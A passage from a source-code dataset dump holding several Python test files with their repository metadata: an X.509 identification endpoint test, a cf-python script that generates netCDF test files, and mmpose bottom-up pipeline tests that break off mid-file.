category = me.IntField(choices=CATEGORIES) | [
"[email protected]"
]
| |
10f47f80b7c9c1ebf1af1c941dbe2dbbc69c281d | a5b4384d1eaef17875499a3f721fedb91afa9fba | /usr/app/wsgi/tests/test_identification.py | 4b2a91ae1772c81ee9d77f68ffac95c017821d1e | []
| no_license | wizardsofindustry/quantum-usr | 85f609b8c08264d69204f696bea0446df19f0eb6 | d49a3dcdf4df2ce31324f5ec98ae5c7130e01cbb | refs/heads/master | 2021-07-18T06:51:16.034613 | 2018-11-23T19:20:23 | 2018-11-23T19:25:16 | 136,974,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,983 | py | import unittest
import ioc
import sq.test
import sq.lib.x509
from ....infra import orm
from ..endpoints import IdentificationEndpoint
@sq.test.integration
class X509SubjectIdentificationTestCase(sq.test.SystemTestCase):
gsid ="00000000-0000-0000-0000-000000000000"
metadata = orm.Relation.metadata
def setUp(self):
super(X509SubjectIdentificationTestCase, self).setUp()
self.endpoint = IdentificationEndpoint()
self.service = ioc.require('SubjectIdentificationService')
with open('dev/usr.testing.crt', 'rb') as f:
self.pem = f.read()
self.crt = sq.lib.x509.Certificate.frompem(self.pem)
self.service.associate(self.gsid,
{'type': 'x509', 'crt': bytes.hex(self.pem)})
@unittest.skip
def test_subject_is_identified_by_email(self):
"""Identify a Subject by email."""
request = sq.test.request_factory(
method='POST',
json=[{
'type': 'email',
'email': "[email protected]"
}]
)
response = self.run_callable(self.loop, self.endpoint.handle, request)
def test_subject_is_identified_by_x509(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'x509',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 200)
def test_unknown_principal_type_returns_404(self):
"""Identify a Subject by X.509 certificate."""
dto = {
'type': 'foo',
'crt': bytes.hex(self.pem)
}
request = self.request_factory(method='POST', json=dto)
response = self.run_callable(self.loop, self.endpoint.handle, request)
self.assertEqual(response.status_code, 404)
#pylint: skip-file
| [
"[email protected]"
]
| |
879079013be7911a134b9b62a20ff2df3d5483f6 | 7d852b8d7b8a6ad7fc9c39957e1097509d08e607 | /cf/test/create_test_files.py | e3fd0f5939be75bd460a289c3d6ae479c19c9f7f | [
"MIT"
]
| permissive | AJamesPhillips/cf-python | ca0a7ca8681fe928f069d5809bf067d064265e38 | 4631bc4ba3c0cb51dcd18905116440007e291e6b | refs/heads/master | 2020-09-20T10:04:38.336267 | 2019-11-27T14:07:53 | 2019-11-27T14:07:53 | 224,445,029 | 0 | 0 | MIT | 2019-11-27T14:08:11 | 2019-11-27T14:08:10 | null | UTF-8 | Python | false | false | 23,397 | py | import datetime
import os
import unittest
import numpy
import netCDF4
import cf
def _make_contiguous_file(filename):
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.7'
n.featureType = 'timeSeries'
station = n.createDimension('station', 4)
obs = n.createDimension('obs' , 24)
name_strlen = n.createDimension('name_strlen', 8)
bounds = n.createDimension('bounds', 2)
lon = n.createVariable('lon', 'f8', ('station',))
lon.standard_name = "longitude"
lon.long_name = "station longitude"
lon.units = "degrees_east"
lon.bounds = "lon_bounds"
lon[...] = [-23, 0, 67, 178]
lon_bounds = n.createVariable('lon_bounds', 'f8', ('station', 'bounds'))
lon_bounds[...] = [[-24, -22],
[ -1, 1],
[ 66, 68],
[177, 179]]
lat = n.createVariable('lat', 'f8', ('station',))
lat.standard_name = "latitude"
lat.long_name = "station latitude"
lat.units = "degrees_north"
lat[...] = [-9, 2, 34, 78]
alt = n.createVariable('alt', 'f8', ('station',))
alt.long_name = "vertical distance above the surface"
alt.standard_name = "height"
alt.units = "m"
alt.positive = "up"
alt.axis = "Z"
alt[...] = [0.5, 12.6, 23.7, 345]
station_name = n.createVariable('station_name', 'S1',
('station', 'name_strlen'))
station_name.long_name = "station name"
station_name.cf_role = "timeseries_id"
station_name[...] = numpy.array([[x for x in 'station1'],
[x for x in 'station2'],
[x for x in 'station3'],
[x for x in 'station4']])
station_info = n.createVariable('station_info', 'i4', ('station',))
station_info.long_name = "some kind of station info"
station_info[...] = [-10, -9, -8, -7]
row_size = n.createVariable('row_size', 'i4', ('station',))
row_size.long_name = "number of observations for this station"
row_size.sample_dimension = "obs"
row_size[...] = [3, 7, 5, 9]
time = n.createVariable('time', 'f8', ('obs',))
time.standard_name = "time"
time.long_name = "time of measurement"
time.units = "days since 1970-01-01 00:00:00"
time.bounds = "time_bounds"
time[ 0: 3] = [-3, -2, -1]
time[ 3:10] = [1, 2, 3, 4, 5, 6, 7]
time[10:15] = [0.5, 1.5, 2.5, 3.5, 4.5]
time[15:24] = range(-2, 7)
time_bounds = n.createVariable('time_bounds', 'f8', ('obs', 'bounds'))
time_bounds[..., 0] = time[...] - 0.5
time_bounds[..., 1] = time[...] + 0.5
humidity = n.createVariable('humidity', 'f8', ('obs',), fill_value=-999.9)
humidity.standard_name = "specific_humidity"
humidity.coordinates = "time lat lon alt station_name station_info"
humidity[ 0: 3] = numpy.arange(0, 3)
humidity[ 3:10] = numpy.arange(1, 71, 10)
humidity[10:15] = numpy.arange(2, 502, 100)
humidity[15:24] = numpy.arange(3, 9003, 1000)
temp = n.createVariable('temp', 'f8', ('obs',), fill_value=-999.9)
temp.standard_name = "air_temperature"
temp.units = "Celsius"
temp.coordinates = "time lat lon alt station_name station_info"
temp[...] = humidity[...] + 273.15
n.close()
return filename
def _make_indexed_file(filename):
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.7'
n.featureType = 'timeSeries'
station = n.createDimension('station', 4)
obs = n.createDimension('obs' , None)
name_strlen = n.createDimension('name_strlen', 8)
bounds = n.createDimension('bounds', 2)
lon = n.createVariable('lon', 'f8', ('station',))
lon.standard_name = "longitude"
lon.long_name = "station longitude"
lon.units = "degrees_east"
lon.bounds = "lon_bounds"
lon[...] = [-23, 0, 67, 178]
lon_bounds = n.createVariable('lon_bounds', 'f8', ('station', 'bounds'))
lon_bounds[...] = [[-24, -22],
[ -1, 1],
[ 66, 68],
[177, 179]]
lat = n.createVariable('lat', 'f8', ('station',))
lat.standard_name = "latitude"
lat.long_name = "station latitude"
lat.units = "degrees_north"
lat[...] = [-9, 2, 34, 78]
alt = n.createVariable('alt', 'f8', ('station',))
alt.long_name = "vertical distance above the surface"
alt.standard_name = "height"
alt.units = "m"
alt.positive = "up"
alt.axis = "Z"
alt[...] = [0.5, 12.6, 23.7, 345]
station_name = n.createVariable('station_name', 'S1',
('station', 'name_strlen'))
station_name.long_name = "station name"
station_name.cf_role = "timeseries_id"
station_name[...] = numpy.array([[x for x in 'station1'],
[x for x in 'station2'],
[x for x in 'station3'],
[x for x in 'station4']])
station_info = n.createVariable('station_info', 'i4', ('station',))
station_info.long_name = "some kind of station info"
station_info[...] = [-10, -9, -8, -7]
#row_size[...] = [3, 7, 5, 9]
stationIndex = n.createVariable('stationIndex', 'i4', ('obs',))
stationIndex.long_name = "which station this obs is for"
stationIndex.instance_dimension= "station"
stationIndex[...] = [3, 2, 1, 0, 2, 3, 3, 3, 1, 1, 0, 2,
3, 1, 0, 1, 2, 3, 2, 3, 3, 3, 1, 1]
t = [[-3, -2, -1],
[1, 2, 3, 4, 5, 6, 7],
[0.5, 1.5, 2.5, 3.5, 4.5],
range(-2, 7)]
time = n.createVariable('time', 'f8', ('obs',))
time.standard_name = "time";
time.long_name = "time of measurement"
time.units = "days since 1970-01-01 00:00:00"
time.bounds = "time_bounds"
ssi = [0, 0, 0, 0]
for i, si in enumerate(stationIndex[...]):
time[i] = t[si][ssi[si]]
ssi[si] += 1
time_bounds = n.createVariable('time_bounds', 'f8', ('obs', 'bounds'))
time_bounds[..., 0] = time[...] - 0.5
time_bounds[..., 1] = time[...] + 0.5
humidity = n.createVariable('humidity', 'f8', ('obs',), fill_value=-999.9)
humidity.standard_name = "specific_humidity"
humidity.coordinates = "time lat lon alt station_name station_info"
h = [numpy.arange(0, 3),
numpy.arange(1, 71, 10),
numpy.arange(2, 502, 100),
numpy.arange(3, 9003, 1000)]
ssi = [0, 0, 0, 0]
for i, si in enumerate(stationIndex[...]):
humidity[i] = h[si][ssi[si]]
ssi[si] += 1
temp = n.createVariable('temp', 'f8', ('obs',), fill_value=-999.9)
temp.standard_name = "air_temperature"
temp.units = "Celsius"
temp.coordinates = "time lat lon alt station_name station_info"
temp[...] = humidity[...] + 273.15
n.close()
return filename
def _make_indexed_contiguous_file(filename):
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.6'
n.featureType = "timeSeriesProfile"
# 3 stations
station = n.createDimension('station', 3)
# 58 profiles spreadover 4 stations, each at a different time
profile = n.createDimension('profile', 58)
obs = n.createDimension('obs' , None)
name_strlen = n.createDimension('name_strlen', 8)
bounds = n.createDimension('bounds', 2)
lon = n.createVariable('lon', 'f8', ('station',))
lon.standard_name = "longitude"
lon.long_name = "station longitude"
lon.units = "degrees_east"
lon.bounds = "lon_bounds"
lon[...] = [-23, 0, 67]
lon_bounds = n.createVariable('lon_bounds', 'f8', ('station', 'bounds'))
lon_bounds[...] = [[-24, -22],
[ -1, 1],
[ 66, 68]]
lat = n.createVariable('lat', 'f8', ('station',))
lat.standard_name = "latitude"
lat.long_name = "station latitude"
lat.units = "degrees_north"
lat[...] = [-9, 2, 34]
alt = n.createVariable('alt', 'f8', ('station',))
alt.long_name = "vertical distance above the surface"
alt.standard_name = "height"
alt.units = "m"
alt.positive = "up"
alt.axis = "Z"
alt[...] = [0.5, 12.6, 23.7]
station_name = n.createVariable('station_name', 'S1',
('station', 'name_strlen'))
station_name.long_name = "station name"
station_name.cf_role = "timeseries_id"
station_name[...] = numpy.array([[x for x in 'station1'],
[x for x in 'station2'],
[x for x in 'station3']])
profile = n.createVariable('profile', 'i4', ('profile'))
profile.cf_role = "profile_id"
profile[...] = numpy.arange(58) + 100
station_info = n.createVariable('station_info', 'i4', ('station',))
station_info.long_name = "some kind of station info"
station_info[...] = [-10, -9, -8]
stationIndex = n.createVariable('stationIndex', 'i4', ('profile',))
stationIndex.long_name = "which station this profile is for"
stationIndex.instance_dimension= "station"
stationIndex[...] = [2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2, 1, 1,
2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2, 1, 1,
2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2, 1, 1,
2, 1, 0, 2, 1, 1, 0, 2,
1, 0, 1, 2, 2]
# station N has list(stationIndex[...]).count(N) profiles
row_size = n.createVariable('row_size', 'i4', ('profile',))
row_size.long_name = "number of observations for this profile"
row_size.sample_dimension = "obs"
row_size[...] = [1, 4, 1, 3, 2, 2, 3, 3, 1, 2, 2, 3, 2, 2, 2, 2, 1, 2, 1, 3, 3, 2, 1,
3, 1, 3, 2, 3, 1, 3, 3, 2, 2, 2, 1, 1, 1, 3, 1, 1, 2, 1, 1, 3, 3, 2,
2, 2, 2, 1, 2, 3, 3, 3, 2, 3, 1, 1] # sum = 118
time = n.createVariable('time', 'f8', ('profile',))
time.standard_name = "time"
time.long_name = "time"
time.units = "days since 1970-01-01 00:00:00"
time.bounds = "time_bounds"
t0 = [3, 0, -3]
ssi = [0, 0, 0]
for i, si in enumerate(stationIndex[...]):
time[i] = t0[si] + ssi[si]
ssi[si] += 1
time_bounds = n.createVariable('time_bounds', 'f8', ('profile', 'bounds'))
time_bounds[..., 0] = time[...] - 0.5
time_bounds[..., 1] = time[...] + 0.5
z = n.createVariable('z', 'f8', ('obs',))
z.standard_name = "altitude"
z.long_name = "height above mean sea level"
z.units = "km"
z.axis = "Z"
z.positive = "up"
z.bounds = "z_bounds"
# z0 = [1, 0, 3]
# i = 0
# for s, r in zip(stationIndex[...], row_size[...]):
# z[i:i+r] = z0[s] + numpy.sort(numpy.random.uniform(0, numpy.random.uniform(1, 2), r))
# i += r
data = [3.51977705293769, 0.521185292100177, 0.575154265863394,
1.08495843717095, 1.37710968624395, 2.07123455611723, 3.47064474274781,
3.88569849023813, 4.81069254279537, 0.264339600625496, 0.915704970094182,
0.0701532210336895, 0.395517651420933, 1.00657582854276,
1.17721374303641, 1.82189345615046, 3.52424307197668, 3.93200473199559,
3.95715099603671, 1.57047493027102, 1.09938982652955, 1.17768722826975,
0.251803399458277, 1.59673486865804, 4.02868944763605, 4.03749228832264,
4.79858281590985, 3.00019933315412, 3.65124061660449, 0.458463542157766,
0.978678197083262, 0.0561560792556281, 0.31182013232255,
3.33350065357286, 4.33143904011861, 0.377894196412131, 1.63020681064712,
2.00097025264771, 3.76948048424458, 0.572927165845568, 1.29408313557905,
1.81296270533192, 0.387142669131077, 0.693459187515738, 1.69261930636298,
1.38258797228361, 1.82590759889566, 3.34993297710761, 0.725250730922501,
1.38221693486728, 1.59828555215646, 1.59281225554253, 0.452340646918555,
0.976663373825433, 1.12640496317618, 3.19366847375422, 3.37209133117904,
3.40665008236976, 3.53525896684001, 4.10444186715724, 0.14920937817654,
0.0907197953552753, 0.42527916794473, 0.618685137936187,
3.01900591447357, 3.37205542289986, 3.86957342976163, 0.17175098751914,
0.990040375014957, 1.57011428605984, 2.12140567043994, 3.24374743730506,
4.24042441581785, 0.929509749153725, 0.0711997786817564,
2.25090028461898, 3.31520955860746, 3.49482624434274, 3.96812568493549,
1.5681807261767, 1.79993011515465, 0.068325990211909, 0.124469638352167,
3.31990436971169, 3.84766748039389, 0.451973490541035, 1.24303219956085,
1.30478004656262, 0.351892459787624, 0.683685812990457,
0.788883736575568, 3.73033428872491, 3.99479807507392, 0.811582011950481,
1.2241242448019, 1.25563109687369, 2.16603674712822, 3.00010622131408,
3.90637137662453, 0.589586644805982, 0.104656387266266,
0.961185900148304, 1.05120351477824, 1.29460917520233, 2.10139985693684,
3.64252693587415, 3.91197236350995, 4.56466622863717, 0.556476687600461,
0.783717448678148, 0.910917550635007, 1.59750076220451, 1.97101264162631,
0.714693043642084, 0.904381625638779, 1.03767817888021, 4.10124675852254,
3.1059214185543]
data = numpy.around(data, 2)
z[...] = data
z_bounds = n.createVariable('z_bounds', 'f8', ('obs', 'bounds'))
z_bounds[..., 0] = z[...] - 0.01
z_bounds[..., 1] = z[...] + 0.01
humidity = n.createVariable('humidity', 'f8', ('obs',), fill_value=-999.9)
humidity.standard_name = "specific_humidity"
humidity.coordinates = "time lat lon alt z station_name station_info profile"
data *= 10
data = numpy.around(data, 2)
humidity[...] = data
temp = n.createVariable('temp', 'f8', ('obs',), fill_value=-999.9)
temp.standard_name = "air_temperature"
temp.units = "Celsius"
temp.coordinates = "time lat lon alt z station_name station_info profile"
data += 2731.5
data = numpy.around(data, 2)
temp[...] = data
n.close()
return filename
contiguous_file = _make_contiguous_file('DSG_timeSeries_contiguous.nc')
indexed_file = _make_indexed_file('DSG_timeSeries_indexed.nc')
indexed_contiguous_file = _make_indexed_contiguous_file('DSG_timeSeriesProfile_indexed_contiguous.nc')
def _make_external_files():
'''
'''
def _pp(filename, parent=False, external=False, combined=False, external_missing=False):
'''
'''
nc = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
nc.createDimension('grid_latitude', 10)
nc.createDimension('grid_longitude', 9)
nc.Conventions = 'CF-1.7'
if parent:
nc.external_variables = 'areacella'
if parent or combined or external_missing:
grid_latitude = nc.createVariable(dimensions=('grid_latitude',),
datatype='f8',
varname='grid_latitude')
grid_latitude.setncatts({'units': 'degrees', 'standard_name': 'grid_latitude'})
grid_latitude[...] = range(10)
grid_longitude = nc.createVariable(dimensions=('grid_longitude',),
datatype='f8',
varname='grid_longitude')
grid_longitude.setncatts({'units': 'degrees', 'standard_name': 'grid_longitude'})
grid_longitude[...] = range(9)
latitude = nc.createVariable(dimensions=('grid_latitude', 'grid_longitude'),
datatype='i4',
varname='latitude')
latitude.setncatts({'units': 'degree_N', 'standard_name': 'latitude'})
latitude[...] = numpy.arange(90).reshape(10, 9)
longitude = nc.createVariable(dimensions=('grid_longitude', 'grid_latitude'),
datatype='i4',
varname='longitude')
longitude.setncatts({'units': 'degreeE', 'standard_name': 'longitude'})
longitude[...] = numpy.arange(90).reshape(9, 10)
eastward_wind = nc.createVariable(dimensions=('grid_latitude', 'grid_longitude'),
datatype='f8',
varname=u'eastward_wind')
eastward_wind.coordinates = u'latitude longitude'
eastward_wind.standard_name = 'eastward_wind'
eastward_wind.cell_methods = 'grid_longitude: mean (interval: 1 day comment: ok) grid_latitude: maximum where sea'
eastward_wind.cell_measures = 'area: areacella'
eastward_wind.units = 'm s-1'
eastward_wind[...] = numpy.arange(90).reshape(10, 9) - 45.5
if external or combined:
areacella = nc.createVariable(dimensions=('grid_longitude', 'grid_latitude'),
datatype='f8',
varname='areacella')
areacella.setncatts({'units': 'm2', 'standard_name': 'cell_area'})
areacella[...] = numpy.arange(90).reshape(9, 10) + 100000.5
nc.close()
#--- End: def
parent_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'parent.nc')
external_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'external.nc')
combined_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'combined.nc')
external_missing_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'external_missing.nc')
_pp(parent_file , parent=True)
_pp(external_file , external=True)
_pp(combined_file , combined=True)
_pp(external_missing_file, external_missing=True)
return parent_file, external_file, combined_file, external_missing_file
(parent_file,
external_file,
combined_file,
external_missing_file) = _make_external_files()
def _make_gathered_file(filename):
'''
'''
def _jj(shape, list_values):
array = numpy.ma.masked_all(shape)
for i, (index, x) in enumerate(numpy.ndenumerate(array)):
if i in list_values:
array[index] = i
return array
#--- End: def
n = netCDF4.Dataset(filename, 'w', format='NETCDF3_CLASSIC')
n.Conventions = 'CF-1.6'
time = n.createDimension('time' , 2)
height = n.createDimension('height' , 3)
lat = n.createDimension('lat' , 4)
lon = n.createDimension('lon' , 5)
p = n.createDimension('p' , 6)
list1 = n.createDimension('list1', 4)
list2 = n.createDimension('list2', 9)
list3 = n.createDimension('list3', 14)
# Dimension coordinate variables
time = n.createVariable('time', 'f8', ('time',))
time.standard_name = "time"
time.units = "days since 2000-1-1"
time[...] = [31, 60]
height = n.createVariable('height', 'f8', ('height',))
height.standard_name = "height"
height.units = "metres"
height.positive = "up"
height[...] = [0.5, 1.5, 2.5]
lat = n.createVariable('lat', 'f8', ('lat',))
lat.standard_name = "latitude"
lat.units = "degrees_north"
lat[...] = [-90, -85, -80, -75]
p = n.createVariable('p', 'i4', ('p',))
p.long_name = "pseudolevel"
p[...] = [1, 2, 3, 4, 5, 6]
# Auxiliary coordinate variables
aux0 = n.createVariable('aux0', 'f8', ('list1',))
aux0.standard_name = "longitude"
aux0.units = "degrees_east"
aux0[...] = numpy.arange(list1.size)
aux1 = n.createVariable('aux1', 'f8', ('list3',))
aux1[...] = numpy.arange(list3.size)
aux2 = n.createVariable('aux2', 'f8', ('time', 'list3', 'p'))
aux2[...] = numpy.arange(time.size * list3.size * p.size).reshape(time.size, list3.size, p.size)
aux3 = n.createVariable('aux3', 'f8', ('p', 'list3', 'time'))
aux3[...] = numpy.arange(p.size * list3.size * time.size).reshape(p.size, list3.size, time.size)
aux4 = n.createVariable('aux4', 'f8', ('p', 'time', 'list3'))
aux4[...] = numpy.arange(p.size * time.size * list3.size).reshape(p.size, time.size, list3.size)
aux5 = n.createVariable('aux5', 'f8', ('list3', 'p', 'time'))
aux5[...] = numpy.arange(list3.size * p.size * time.size).reshape(list3.size, p.size, time.size)
aux6 = n.createVariable('aux6', 'f8', ('list3', 'time'))
aux6[...] = numpy.arange(list3.size * time.size).reshape(list3.size, time.size)
aux7 = n.createVariable('aux7', 'f8', ('lat',))
aux7[...] = numpy.arange(lat.size)
aux8 = n.createVariable('aux8', 'f8', ('lon', 'lat',))
aux8[...] = numpy.arange(lon.size * lat.size).reshape(lon.size, lat.size)
aux9 = n.createVariable('aux9', 'f8', ('time', 'height'))
aux9[...] = numpy.arange(time.size * height.size).reshape(time.size, height.size)
# List variables
list1 = n.createVariable('list1', 'i', ('list1',))
list1.compress = "lon"
list1[...] = [0, 1, 3, 4]
list2 = n.createVariable('list2', 'i', ('list2',))
list2.compress = "lat lon"
list2[...] = [0, 1, 5, 6, 13, 14, 17, 18, 19]
list3 = n.createVariable('list3', 'i', ('list3',))
list3.compress = "height lat lon"
array = _jj((3, 4, 5),
[0, 1, 5, 6, 13, 14, 25, 26, 37, 38, 48, 49, 58, 59])
list3[...] = array.compressed()
# Data variables
temp1 = n.createVariable('temp1', 'f8', ('time', 'height', 'lat', 'list1', 'p'))
temp1.long_name = "temp1"
temp1.units = "K"
temp1.coordinates = "aux0 aux7 aux8 aux9"
temp1[...] = numpy.arange(2*3*4*4*6).reshape(2, 3, 4, 4, 6)
temp2 = n.createVariable('temp2', 'f8', ('time', 'height', 'list2', 'p'))
temp2.long_name = "temp2"
temp2.units = "K"
temp2.coordinates = "aux7 aux8 aux9"
temp2[...] = numpy.arange(2*3*9*6).reshape(2, 3, 9, 6)
temp3 = n.createVariable('temp3', 'f8', ('time', 'list3', 'p'))
temp3.long_name = "temp3"
temp3.units = "K"
temp3.coordinates = "aux0 aux1 aux2 aux3 aux4 aux5 aux6 aux7 aux8 aux9"
temp3[...] = numpy.arange(2*14*6).reshape(2, 14, 6)
n.close()
return filename
gathered = _make_gathered_file('gathered.nc')
if __name__ == '__main__':
print('Run date:', datetime.datetime.utcnow())
print(cf.environment(display=False))
print()
unittest.main(verbosity=2)
| [
"[email protected]"
]
| |
579e5cbdefc699b964e62dbd7f5acf9f3aee439e | 36fbba7b0823e04062c41f26385ed71da5b4f4d4 | /tests/test_pipelines/test_bottom_up_pipelines.py | f687ecb2a385b85dc28988e7ed7937410b446a76 | [
"Apache-2.0"
]
| permissive | cherryjm/mmpose | 2fcd4504a0a0d46f6a4dce6d0be1141fdead6bb5 | b0acfc423da672e61db75e00df9da106b6ead574 | refs/heads/master | 2023-06-12T10:15:45.964450 | 2021-05-07T06:06:31 | 2021-05-07T06:06:31 | 346,599,724 | 1 | 0 | Apache-2.0 | 2021-03-11T06:22:06 | 2021-03-11T06:22:05 | null | UTF-8 | Python | false | false | 12,297 | py | import copy
import os.path as osp
import numpy as np
import pytest
import xtcocotools
from xtcocotools.coco import COCO
from mmpose.datasets.pipelines import (BottomUpGenerateHeatmapTarget,
BottomUpGeneratePAFTarget,
BottomUpGenerateTarget,
BottomUpGetImgSize,
BottomUpRandomAffine,
BottomUpRandomFlip, BottomUpResizeAlign,
LoadImageFromFile)
def _get_mask(coco, anno, img_id):
img_info = coco.loadImgs(img_id)[0]
m = np.zeros((img_info['height'], img_info['width']), dtype=np.float32)
for obj in anno:
if obj['iscrowd']:
rle = xtcocotools.mask.frPyObjects(obj['segmentation'],
img_info['height'],
img_info['width'])
m += xtcocotools.mask.decode(rle)
elif obj['num_keypoints'] == 0:
rles = xtcocotools.mask.frPyObjects(obj['segmentation'],
img_info['height'],
img_info['width'])
for rle in rles:
m += xtcocotools.mask.decode(rle)
return m < 0.5
def _get_joints(anno, ann_info, int_sigma):
num_people = len(anno)
if ann_info['scale_aware_sigma']:
joints = np.zeros((num_people, ann_info['num_joints'], 4),
dtype=np.float32)
else:
joints = np.zeros((num_people, ann_info['num_joints'], 3),
dtype=np.float32)
for i, obj in enumerate(anno):
joints[i, :ann_info['num_joints'], :3] = \
np.array(obj['keypoints']).reshape([-1, 3])
if ann_info['scale_aware_sigma']:
# get person box
box = obj['bbox']
size = max(box[2], box[3])
sigma = size / 256 * 2
if int_sigma:
sigma = int(np.ceil(sigma))
assert sigma > 0, sigma
joints[i, :, 3] = sigma
return joints
def _check_flip(origin_imgs, result_imgs):
"""Check if the origin_imgs are flipped correctly."""
h, w, c = origin_imgs.shape
for i in range(h):
for j in range(w):
for k in range(c):
if result_imgs[i, j, k] != origin_imgs[i, w - 1 - j, k]:
return False
return True
def test_bottomup_pipeline():
data_prefix = 'tests/data/coco/'
ann_file = osp.join(data_prefix, 'test_coco.json')
coco = COCO(ann_file)
ann_info = {}
ann_info['flip_pairs'] = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16]]
ann_info['flip_index'] = [
0, 2, 1, 4, 3, 6, 5, 8, 7, 10, 9, 12, 11, 14, 13, 16, 15
]
ann_info['use_different_joint_weights'] = False
ann_info['joint_weights'] = np.array([
1., 1., 1., 1., 1., 1., 1., 1.2, 1.2, 1.5, 1.5, 1., 1., 1.2, 1.2, 1.5,
1.5
],
dtype=np.float32).reshape((17, 1))
ann_info['image_size'] = np.array(512)
ann_info['heatmap_size'] = np.array([128, 256])
ann_info['num_joints'] = 17
ann_info['num_scales'] = 2
ann_info['scale_aware_sigma'] = False
ann_ids = coco.getAnnIds(785)
anno = coco.loadAnns(ann_ids)
mask = _get_mask(coco, anno, 785)
anno = [
obj for obj in anno if obj['iscrowd'] == 0 or obj['num_keypoints'] > 0
]
joints = _get_joints(anno, ann_info, False)
mask_list = [mask.copy() for _ in range(ann_info['num_scales'])]
joints_list = [joints.copy() for _ in range(ann_info['num_scales'])]
results = {}
results['dataset'] = 'coco'
results['image_file'] = osp.join(data_prefix, '000000000785.jpg')
results['mask'] = mask_list
results['joints'] = joints_list
results['ann_info'] = ann_info
transform = LoadImageFromFile()
results = transform(copy.deepcopy(results))
assert results['img'].shape == (425, 640, 3)
# test HorizontalFlip
random_horizontal_flip = BottomUpRandomFlip(flip_prob=1.)
results_horizontal_flip = random_horizontal_flip(copy.deepcopy(results))
assert _check_flip(results['img'], results_horizontal_flip['img'])
random_horizontal_flip = BottomUpRandomFlip(flip_prob=0.)
results_horizontal_flip = random_horizontal_flip(copy.deepcopy(results))
assert (results['img'] == results_horizontal_flip['img']).all()
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
# test TopDownAffine
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5], 'short', 0)
results_affine_transform = random_affine_transform(copy.deepcopy(results))
assert results_affine_transform['img'].shape == (512, 512, 3)
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5], 'short',
40)
results_affine_transform = random_affine_transform(copy.deepcopy(results))
assert results_affine_transform['img'].shape == (512, 512, 3)
results_copy = copy.deepcopy(results)
results_copy['ann_info']['scale_aware_sigma'] = True
joints = _get_joints(anno, results_copy['ann_info'], False)
results_copy['joints'] = \
[joints.copy() for _ in range(results_copy['ann_info']['num_scales'])]
results_affine_transform = random_affine_transform(results_copy)
assert results_affine_transform['img'].shape == (512, 512, 3)
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5], 'long', 40)
results_affine_transform = random_affine_transform(copy.deepcopy(results))
assert results_affine_transform['img'].shape == (512, 512, 3)
with pytest.raises(ValueError):
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5],
'short-long', 40)
results_affine_transform = random_affine_transform(
copy.deepcopy(results))
# test BottomUpGenerateTarget
generate_multi_target = BottomUpGenerateTarget(2, 30)
results_generate_multi_target = generate_multi_target(
copy.deepcopy(results))
assert 'targets' in results_generate_multi_target
assert len(results_generate_multi_target['targets']
) == results['ann_info']['num_scales']
# test BottomUpGetImgSize when W > H
get_multi_scale_size = BottomUpGetImgSize([1])
results_get_multi_scale_size = get_multi_scale_size(copy.deepcopy(results))
assert 'test_scale_factor' in results_get_multi_scale_size['ann_info']
assert 'base_size' in results_get_multi_scale_size['ann_info']
assert 'center' in results_get_multi_scale_size['ann_info']
assert 'scale' in results_get_multi_scale_size['ann_info']
assert results_get_multi_scale_size['ann_info']['base_size'][1] == 512
# test BottomUpResizeAlign
transforms = [
dict(type='ToTensor'),
dict(
type='NormalizeTensor',
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
]
resize_align_multi_scale = BottomUpResizeAlign(transforms=transforms)
results_copy = copy.deepcopy(results_get_multi_scale_size)
results_resize_align_multi_scale = resize_align_multi_scale(results_copy)
assert 'aug_data' in results_resize_align_multi_scale['ann_info']
# test BottomUpGetImgSize when W < H
results_copy = copy.deepcopy(results)
results_copy['img'] = np.random.rand(640, 425, 3)
results_get_multi_scale_size = get_multi_scale_size(results_copy)
assert results_get_multi_scale_size['ann_info']['base_size'][0] == 512
def test_BottomUpGenerateHeatmapTarget():
data_prefix = 'tests/data/coco/'
